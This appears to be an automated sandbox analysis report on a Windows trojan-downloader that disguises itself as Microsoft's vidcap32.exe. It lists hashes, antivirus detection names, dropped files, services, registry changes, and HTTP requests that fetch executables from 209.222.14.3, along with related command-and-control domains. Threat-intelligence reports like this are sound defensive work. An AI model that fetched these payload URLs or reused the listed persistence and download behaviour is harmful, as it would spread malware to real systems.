Analysis Date: 2015-01-24 21:39:26
MD5: 6b0c1042628787cbd868d9a1995ec826
SHA1: e6dfc4ff8e8f39315376c8476590b3e2095f993a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: c0d928faa1d55c375decda858a4db915 sha1: d1a344dafb3e50a523797d7afc010e147f603cc8 size: 65024
Section: INIT_TEX md5: 5c2ae2c740225cf9d8c2e1b65f049719 sha1: 34e609512c684f432b6517703d7d8d699dbd41ee size: 512
Section: .data md5: 74a22cd0e9ac7235b7e0f82e17e01b11 sha1: 574e77195a35a1f212376b6796d8324a46413e6e size: 11776
Section: .rsrc md5: 5d78fb20039c1a09d1abb40350c3bb97 sha1: 2ad91221f900fa1bee12c740e4336c6cd1f92551 size: 66053
Section: .tcp md5: c20c14c18831a4ca3bdf7273c0bfaa7b sha1: ae6642da16594e03a089a4afaa485986be2945aa size: 26624
Timestamp: 1999-03-27 17:57:59
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-1999
InternalName: vidcap32.exe
FileVersion: 5.00.2008.1
CompanyName: Microsoft Corporation
ProductName: Microsoft(R) Windows (R) 2000 Operating System
ProductVersion: 5.00.2008.1
FileDescription: Microsoft® Video Capture Utility
OriginalFilename: vidcap32.exe
PEhash: 19371f09c3e650c85b78f3ba00cfc28e8c6141c8
IMPhash: 4b14e9ebd7fd5133f8c98fd8d1597b7f
AV: 360 Safe - Virus.Win32.Agent.O
AV: Ad-Aware - Win32.Viking.AR
AV: Alwil (avast) - Crypt-RPT [Trj]
AV: Arcabit (arcavir) - Win32.Viking.AR
AV: Authentium - W32/Patched.E.gen!Eldorado
AV: Avira (antivir) - W32/Fujacks.DR
AV: BullGuard - Win32.Viking.AR
AV: CA (E-Trust Ino) - Win32/Viking.D
AV: CAT (quickheal) - W32.Agent.DP
AV: ClamAV - Worm.Fujack-55
AV: Dr. Web - Win32.HLLW.Autoruner.8224
AV: Emsisoft - Win32.Viking.AR
AV: Eset (nod32) - Win32/Agent.DP virus
AV: Fortinet - W32/Fujacks.BF!tr
AV: Frisk (f-prot) - W32/Patched.E.gen!Eldorado
AV: F-Secure - Win32.Viking.AR
AV: Grisoft (avg) - Win32/Funlove.corrupted
AV: Ikarus - Trojan-Downloader.Win32.Jadtre
AV: K7 - Virus ( 00108a531 )
AV: Kaspersky - Virus.Win32.Agent.dp
AV: MalwareBytes - no_virus
AV: Mcafee - W32/Fujacks.ay
AV: Microsoft Security Essentials - Virus:Win32/Viking.NK
AV: MicroWorld (escan) - Win32.Viking.AR
AV: Rising - Win32.Agent.hn
AV: Sophos - W32/FuzVir-A
AV: Symantec - W32.Loorp.A!inf
AV: Trend Micro - PE_JEEFO.D
AV: VirusBlokAda (vba32) - Virus.Win32.Koklek

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\UHM3ETW3\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\AM4HBUNJ\desktop.ini
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\OPQRSTUV\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\705SOLY5\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 209.222.14.3
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1800

Process
↳ Pid 1104

Network Details:

DNS: www.a.shifen.com
Type: A
180.76.3.151
DNS: pc1.114central.com
Type: A
209.222.14.3
DNS: www.baidu.com
Type: A
DNS: nbtj.114anhui.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://209.222.14.3/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://209.222.14.3/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://209.222.14.3/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1035 ➝ 209.222.14.3:80

Raw Pcap

Strings
     